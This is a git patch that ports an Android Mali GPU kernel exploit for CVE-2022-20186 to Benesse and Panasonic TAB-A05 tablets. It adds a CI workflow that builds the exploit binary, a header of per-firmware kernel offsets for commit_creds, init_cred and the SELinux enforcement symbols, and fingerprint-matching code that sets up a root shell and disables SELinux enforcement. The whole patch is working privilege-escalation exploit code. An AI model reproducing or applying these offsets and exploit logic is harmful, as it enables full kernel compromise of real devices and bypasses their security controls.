From 9cad991f22aecd60670fbbea94aa6451ac779965 Mon Sep 17 00:00:00 2001 From: Syuugo Date: Sat, 29 Jun 2024 02:05:18 +0900 Subject: [PATCH] --- .github/workflows/compile.yml | 27 ++++++ .gitignore | 1 + mali_alias.c | 159 ++++++++++++++++++++++------------ offsets.h | 126 +++++++++++++++++++++++++++ 4 files changed, 256 insertions(+), 57 deletions(-) create mode 100644 .github/workflows/compile.yml create mode 100644 .gitignore create mode 100644 offsets.h diff --git a/.github/workflows/compile.yml b/.github/workflows/compile.yml new file mode 100644 index 0000000..6f11493 --- /dev/null +++ b/.github/workflows/compile.yml @@ -0,0 +1,27 @@ +name: Compile + +on: + push: + paths: + - '*.c' + - '*.h' + - '.github/workflows/compile.yml' + workflow_dispatch: + +jobs: + compile: + name: Compile + runs-on: ubuntu-latest + + steps: + - name: Checkout + uses: actions/checkout@v4 + + - name: Compile + run: $ANDROID_NDK/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android28-clang mali_alias.c -o mali_alias + + - name: Uplaod + uses: actions/upload-artifact@v4 + with: + name: CVE-2022-20186 + path: mali_alias diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..b5db147 --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +/mali_alias diff --git a/mali_alias.c b/mali_alias.c index b57354a..b338dc9 100644 --- a/mali_alias.c +++ b/mali_alias.c @@ -1,6 +1,7 @@ #include #include #include +#include #include #include #include @@ -11,8 +12,7 @@ #include #include -#include "stdbool.h" - +#include "offsets.h" #include "mali.h" #include "mali_base_jm_kernel.h" #include "midgard.h" @@ -27,11 +27,11 @@ #define POOL_SIZE 16384 -#define RESERVED_SIZE 32 +#define RESERVED_SIZE 12 #define TOTAL_RESERVED_SIZE 1024 -#define KERNEL_BASE 0x80000000 +#define KERNEL_BASE 0x40008000 #define OVERWRITE_INDEX 256 @@ -43,45 +43,9 @@ #define ADD_COMMIT_INDEX 3 -#define AVC_DENY_2108 0x92df1c - -#define SEL_READ_ENFORCE_2108 0x942ae4 - -#define INIT_CRED_2108 0x29a0570 - -#define COMMIT_CREDS_2108 0x180b0c - -#define ADD_INIT_2108 0x9115c000 - -#define ADD_COMMIT_2108 0x912c3108 - -#define AVC_DENY_2201 0x930af4 - -#define SEL_READ_ENFORCE_2201 0x9456bc - -#define INIT_CRED_2201 0x29b0570 - -#define COMMIT_CREDS_2201 0x183df0 - -#define ADD_INIT_2201 0x9115c000 - -#define ADD_COMMIT_2201 0x9137c108 - -#define AVC_DENY_2202 0x930b50 - -#define SEL_READ_ENFORCE_2202 0x94551c - -#define INIT_CRED_2202 0x29b0570 +static uint64_t sel_read_enforce; -#define COMMIT_CREDS_2202 0x183e3c - -#define ADD_INIT_2202 0x9115c000 //add x0, x0, #0x570 - -#define ADD_COMMIT_2202 0x9138f108 //add x8, x8, #0xe3c - -static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2108; - -static uint64_t avc_deny = AVC_DENY_2108; +static uint64_t avc_deny; static int atom_number = 1; @@ -252,7 +216,7 @@ void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, e struct MALI_JOB_HEADER jh = {0}; jh.is_64b = true; jh.type = MALI_JOB_TYPE_WRITE_VALUE; - + struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0}; payload.type = type; payload.immediate_value = value; @@ -375,24 +339,105 @@ void select_offset() { char fingerprint[256]; int len = __system_property_get("ro.build.fingerprint", fingerprint); printf("fingerprint: %s\n", fingerprint); - if (!strcmp(fingerprint, "google/oriole/oriole:12/SD1A.210817.037/7862242:user/release-keys")) { - avc_deny = AVC_DENY_2108; - sel_read_enforce = SEL_READ_ENFORCE_2108; - fixup_root_shell(INIT_CRED_2108, COMMIT_CREDS_2108, SEL_READ_ENFORCE_2108, ADD_INIT_2108, ADD_COMMIT_2108); + + if(!strcmp(fingerprint, CTX_00_04_000)) { + avc_deny = AVC_DENY_CTX_00_04_000; + sel_read_enforce = SEL_READ_ENFORCE_CTX_00_04_000; + fixup_root_shell(INIT_CRED_CTX_00_04_000, COMMIT_CREDS_CTX_00_04_000, SEL_READ_ENFORCE_CTX_00_04_000, ADD_INIT_CTX_00_04_000, ADD_COMMIT_CTX_00_04_000); + return; + } + + if(!strcmp(fingerprint, CTX_00_05_000)) { + avc_deny = AVC_DENY_CTX_00_05_000; + sel_read_enforce = SEL_READ_ENFORCE_CTX_00_05_000; + fixup_root_shell(INIT_CRED_CTX_00_05_000, COMMIT_CREDS_CTX_00_05_000, SEL_READ_ENFORCE_CTX_00_05_000, ADD_INIT_CTX_00_05_000, ADD_COMMIT_CTX_00_05_000); + return; + } + + if(!strcmp(fingerprint, CTX_00_08_000)) { + avc_deny = AVC_DENY_CTX_00_08_000; + sel_read_enforce = SEL_READ_ENFORCE_CTX_00_08_000; + fixup_root_shell(INIT_CRED_CTX_00_08_000, COMMIT_CREDS_CTX_00_08_000, SEL_READ_ENFORCE_CTX_00_08_000, ADD_INIT_CTX_00_08_000, ADD_COMMIT_CTX_00_08_000); + return; + } + + if(!strcmp(fingerprint, CTX_00_09_000)) { + avc_deny = AVC_DENY_CTX_00_09_000; + sel_read_enforce = SEL_READ_ENFORCE_CTX_00_09_000; + fixup_root_shell(INIT_CRED_CTX_00_09_000, COMMIT_CREDS_CTX_00_09_000, SEL_READ_ENFORCE_CTX_00_09_000, ADD_INIT_CTX_00_09_000, ADD_COMMIT_CTX_00_09_000); + return; + } + + if(!strcmp(fingerprint, CTX_01_00_000)) { + avc_deny = AVC_DENY_CTX_01_00_000; + sel_read_enforce = SEL_READ_ENFORCE_CTX_01_00_000; + fixup_root_shell(INIT_CRED_CTX_01_00_000, COMMIT_CREDS_CTX_01_00_000, SEL_READ_ENFORCE_CTX_01_00_000, ADD_INIT_CTX_01_00_000, ADD_COMMIT_CTX_01_00_000); return; } - if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220105.007/8030436:user/release-keys")) { - avc_deny = AVC_DENY_2201; - sel_read_enforce = SEL_READ_ENFORCE_2201; - fixup_root_shell(INIT_CRED_2201, COMMIT_CREDS_2201, SEL_READ_ENFORCE_2201, ADD_INIT_2201, ADD_COMMIT_2201); + + if(!strcmp(fingerprint, CTX_01_01_001)) { + avc_deny = AVC_DENY_CTX_01_01_001; + sel_read_enforce = SEL_READ_ENFORCE_CTX_01_01_001; + fixup_root_shell(INIT_CRED_CTX_01_01_001, COMMIT_CREDS_CTX_01_01_001, SEL_READ_ENFORCE_CTX_01_01_001, ADD_INIT_CTX_01_01_001, ADD_COMMIT_CTX_01_01_001); + return; + } + + if(!strcmp(fingerprint, CTX_01_04_000)) { + avc_deny = AVC_DENY_CTX_01_04_000; + sel_read_enforce = SEL_READ_ENFORCE_CTX_01_04_000; + fixup_root_shell(INIT_CRED_CTX_01_04_000, COMMIT_CREDS_CTX_01_04_000, SEL_READ_ENFORCE_CTX_01_04_000, ADD_INIT_CTX_01_04_000, ADD_COMMIT_CTX_01_04_000); return; } - if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys")) { - avc_deny = AVC_DENY_2202; - sel_read_enforce = SEL_READ_ENFORCE_2202; - fixup_root_shell(INIT_CRED_2202, COMMIT_CREDS_2202, SEL_READ_ENFORCE_2202, ADD_INIT_2202, ADD_COMMIT_2202); + + if(!strcmp(fingerprint, CTX_01_11_000)) { + avc_deny = AVC_DENY_CTX_01_11_000; + sel_read_enforce = SEL_READ_ENFORCE_CTX_01_11_000; + fixup_root_shell(INIT_CRED_CTX_01_11_000, COMMIT_CREDS_CTX_01_11_000, SEL_READ_ENFORCE_CTX_01_11_000, ADD_INIT_CTX_01_11_000, ADD_COMMIT_CTX_01_11_000); + return; + } + + if(!strcmp(fingerprint, CTZ_00_03_000)) { + avc_deny = AVC_DENY_CTZ_00_03_000; + sel_read_enforce = SEL_READ_ENFORCE_CTZ_00_03_000; + fixup_root_shell(INIT_CRED_CTZ_00_03_000, COMMIT_CREDS_CTZ_00_03_000, SEL_READ_ENFORCE_CTZ_00_03_000, ADD_INIT_CTZ_00_03_000, ADD_COMMIT_CTZ_00_03_000); + return; + } + + if(!strcmp(fingerprint, CTZ_01_00_000)) { + avc_deny = AVC_DENY_CTZ_01_00_000; + sel_read_enforce = SEL_READ_ENFORCE_CTZ_01_00_000; + fixup_root_shell(INIT_CRED_CTZ_01_00_000, COMMIT_CREDS_CTZ_01_00_000, SEL_READ_ENFORCE_CTZ_01_00_000, ADD_INIT_CTZ_01_00_000, ADD_COMMIT_CTZ_01_00_000); return; } + + if(!strcmp(fingerprint, CTZ_01_01_000)) { + avc_deny = AVC_DENY_CTZ_01_01_000; + sel_read_enforce = SEL_READ_ENFORCE_CTZ_01_01_000; + fixup_root_shell(INIT_CRED_CTZ_01_01_000, COMMIT_CREDS_CTZ_01_01_000, SEL_READ_ENFORCE_CTZ_01_01_000, ADD_INIT_CTZ_01_01_000, ADD_COMMIT_CTZ_01_01_000); + return; + } + + if(!strcmp(fingerprint, CTZ_01_02_004)) { + avc_deny = AVC_DENY_CTZ_01_02_004; + sel_read_enforce = SEL_READ_ENFORCE_CTZ_01_02_004; + fixup_root_shell(INIT_CRED_CTZ_01_02_004, COMMIT_CREDS_CTZ_01_02_004, SEL_READ_ENFORCE_CTZ_01_02_004, ADD_INIT_CTZ_01_02_004, ADD_COMMIT_CTZ_01_02_004); + return; + } + + if(!strcmp(fingerprint, CTZ_01_02_005)) { + avc_deny = AVC_DENY_CTZ_01_02_005; + sel_read_enforce = SEL_READ_ENFORCE_CTZ_01_02_005; + fixup_root_shell(INIT_CRED_CTZ_01_02_005, COMMIT_CREDS_CTZ_01_02_005, SEL_READ_ENFORCE_CTZ_01_02_005, ADD_INIT_CTZ_01_02_005, ADD_COMMIT_CTZ_01_02_005); + return; + } + + if(!strcmp(fingerprint, CTZ_01_03_000)) { + avc_deny = AVC_DENY_CTZ_01_03_000; + sel_read_enforce = SEL_READ_ENFORCE_CTZ_01_03_000; + fixup_root_shell(INIT_CRED_CTZ_01_03_000, COMMIT_CREDS_CTZ_01_03_000, SEL_READ_ENFORCE_CTZ_01_03_000, ADD_INIT_CTZ_01_03_000, ADD_COMMIT_CTZ_01_03_000); + return; + } + err(1, "unable to match build id\n"); } @@ -491,11 +536,11 @@ int run_exploit() { int main() { setbuf(stdout, NULL); setbuf(stderr, NULL); - + select_offset(); int ret = -1; sleep(1); ret = run_exploit(); - if (!ret) system("sh"); + if (!ret) system("getenforce"); } diff --git a/offsets.h b/offsets.h new file mode 100644 index 0000000..a6ba351 --- /dev/null +++ b/offsets.h @@ -0,0 +1,126 @@ + +// TAB-A05-BD 00.04.000 +#define CTX_00_04_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/00.04.000/00.04.000:user/release-keys" +#define COMMIT_CREDS_CTX_00_04_000 0x5a120 +#define AVC_DENY_CTX_00_04_000 0x35acc8 +#define SEL_READ_ENFORCE_CTX_00_04_000 0x3653a8 +#define INIT_CRED_CTX_00_04_000 0x11553f0 +#define ADD_INIT_CTX_00_04_000 0x910fc000 +#define ADD_COMMIT_CTX_00_04_000 0x91048108 + +// TAB-A05-BD 00.05.000 +#define CTX_00_05_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/00.05.000/00.05.000:user/release-keys" +#define COMMIT_CREDS_CTX_00_05_000 0x5a120 +#define AVC_DENY_CTX_00_05_000 0x35acc8 +#define SEL_READ_ENFORCE_CTX_00_05_000 0x3653a8 +#define INIT_CRED_CTX_00_05_000 0x11553f0 +#define ADD_INIT_CTX_00_05_000 0x910fc000 +#define ADD_COMMIT_CTX_00_05_000 0x91048108 + +// TAB-A05-BD 00.08.000 +#define CTX_00_08_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/00.08.000/00.08.000:user/release-keys" +#define COMMIT_CREDS_CTX_00_08_000 0x5a120 +#define AVC_DENY_CTX_00_08_000 0x35acc8 +#define SEL_READ_ENFORCE_CTX_00_08_000 0x3653a8 +#define INIT_CRED_CTX_00_08_000 0x11553f0 +#define ADD_INIT_CTX_00_08_000 0x910fc000 +#define ADD_COMMIT_CTX_00_08_000 0x91048108 + +// TAB-A05-BD 00.09.000 +#define CTX_00_09_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/00.09.000/00.09.000:user/release-keys" +#define COMMIT_CREDS_CTX_00_09_000 0x5a120 +#define AVC_DENY_CTX_00_09_000 0x35acc8 +#define SEL_READ_ENFORCE_CTX_00_09_000 0x3653a8 +#define INIT_CRED_CTX_00_09_000 0x11553f0 +#define ADD_INIT_CTX_00_09_000 0x910fc000 +#define ADD_COMMIT_CTX_00_09_000 0x91048108 + +// TAB-A05-BD 01.00.000 +#define CTX_01_00_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/01.00.000/01.00.000:user/release-keys" +#define COMMIT_CREDS_CTX_01_00_000 0x5a120 +#define AVC_DENY_CTX_01_00_000 0x35acc8 +#define SEL_READ_ENFORCE_CTX_01_00_000 0x3653a8 +#define INIT_CRED_CTX_01_00_000 0x11553f0 +#define ADD_INIT_CTX_01_00_000 0x910fc000 +#define ADD_COMMIT_CTX_01_00_000 0x91048108 + +// TAB-A05-BD 01.01.001 +#define CTX_01_01_001 "benesse/TAB-A05-BD/TAB-A05-BD:9/01.01.001/01.01.001:user/release-keys" +#define COMMIT_CREDS_CTX_01_01_001 0x5a120 +#define AVC_DENY_CTX_01_01_001 0x35acc8 +#define SEL_READ_ENFORCE_CTX_01_01_001 0x365418 +#define INIT_CRED_CTX_01_01_001 0x11653f0 +#define ADD_INIT_CTX_01_01_001 0x910fc000 +#define ADD_COMMIT_CTX_01_01_001 0x91048108 + +// TAB-A05-BD 01.04.000 +#define CTX_01_04_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/01.04.000/01.04.000:user/release-keys" +#define COMMIT_CREDS_CTX_01_04_000 0x5a120 +#define AVC_DENY_CTX_01_04_000 0x35ac10 +#define SEL_READ_ENFORCE_CTX_01_04_000 0x365360 +#define INIT_CRED_CTX_01_04_000 0x11653f0 +#define ADD_INIT_CTX_01_04_000 0x910fc000 +#define ADD_COMMIT_CTX_01_04_000 0x91048108 + +// TAB-A05-BD 01.11.000 +#define CTX_01_11_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/01.11.000/01.11.000:user/release-keys" +#define COMMIT_CREDS_CTX_01_11_000 0x5a120 +#define AVC_DENY_CTX_01_11_000 0x359c20 +#define SEL_READ_ENFORCE_CTX_01_11_000 0x364370 +#define INIT_CRED_CTX_01_11_000 0x11653f0 +#define ADD_INIT_CTX_01_11_000 0x910fc000 +#define ADD_COMMIT_CTX_01_11_000 0x91048108 + +// TAB-A05-BA1 00.03.000 +#define CTZ_00_03_000 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/00.03.000/00.03.000:user/release-keys" +#define COMMIT_CREDS_CTZ_00_03_000 0x5a120 +#define AVC_DENY_CTZ_00_03_000 0x359c20 +#define SEL_READ_ENFORCE_CTZ_00_03_000 0x364370 +#define INIT_CRED_CTZ_00_03_000 0x11753f0 +#define ADD_INIT_CTZ_00_03_000 0x910fc000 +#define ADD_COMMIT_CTZ_00_03_000 0x91048108 + +// TAB-A05-BA1 01.00.000 +#define CTZ_01_00_000 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.00.000/01.00.000:user/release-keys" +#define COMMIT_CREDS_CTZ_01_00_000 0x5a120 +#define AVC_DENY_CTZ_01_00_000 0x359c20 +#define SEL_READ_ENFORCE_CTZ_01_00_000 0x364370 +#define INIT_CRED_CTZ_01_00_000 0x11653f0 +#define ADD_INIT_CTZ_01_00_000 0x910fc000 +#define ADD_COMMIT_CTZ_01_00_000 0x91048108 + +// TAB-A05-BA1 01.01.000 +#define CTZ_01_01_000 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.01.000/01.01.000:user/release-keys" +#define COMMIT_CREDS_CTZ_01_01_000 0x5a120 +#define AVC_DENY_CTZ_01_01_000 0x359a68 +#define SEL_READ_ENFORCE_CTZ_01_01_000 0x3641b8 +#define INIT_CRED_CTZ_01_01_000 0x11653f0 +#define ADD_INIT_CTZ_01_01_000 0x910fc000 +#define ADD_COMMIT_CTZ_01_01_000 0x91048108 + +// TAB-A05-BA1 01.02.004 +#define CTZ_01_02_004 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.02.004/01.02.004:user/release-keys" +#define COMMIT_CREDS_CTZ_01_02_004 0x5a120 +#define AVC_DENY_CTZ_01_02_004 0x35bad0 +#define SEL_READ_ENFORCE_CTZ_01_02_004 0x366190 +#define INIT_CRED_CTZ_01_02_004 0x11a53f0 +#define ADD_INIT_CTZ_01_02_004 0x910fc000 +#define ADD_COMMIT_CTZ_01_02_004 0x91048108 + +// TAB-A05-BA1 01.02.005 +#define CTZ_01_02_005 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.02.005/01.02.005:user/release-keys" +#define COMMIT_CREDS_CTZ_01_02_005 0x5a120 +#define AVC_DENY_CTZ_01_02_005 0x35bad0 +#define SEL_READ_ENFORCE_CTZ_01_02_005 0x366190 +#define INIT_CRED_CTZ_01_02_005 0x11a53f0 +#define ADD_INIT_CTZ_01_02_005 0x910fc000 +#define ADD_COMMIT_CTZ_01_02_005 0x91048108 + +// TAB-A05-BA1 01.03.000 +#define CTZ_01_03_000 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.03.000/01.03.000:user/release-keys" +#define COMMIT_CREDS_CTZ_01_03_000 0x5a120 +#define AVC_DENY_CTZ_01_03_000 0x35bad0 +#define SEL_READ_ENFORCE_CTZ_01_03_000 0x366190 +#define INIT_CRED_CTZ_01_03_000 0x11a53f0 +#define ADD_INIT_CTZ_01_03_000 0x910fc000 +#define ADD_COMMIT_CTZ_01_03_000 0x91048108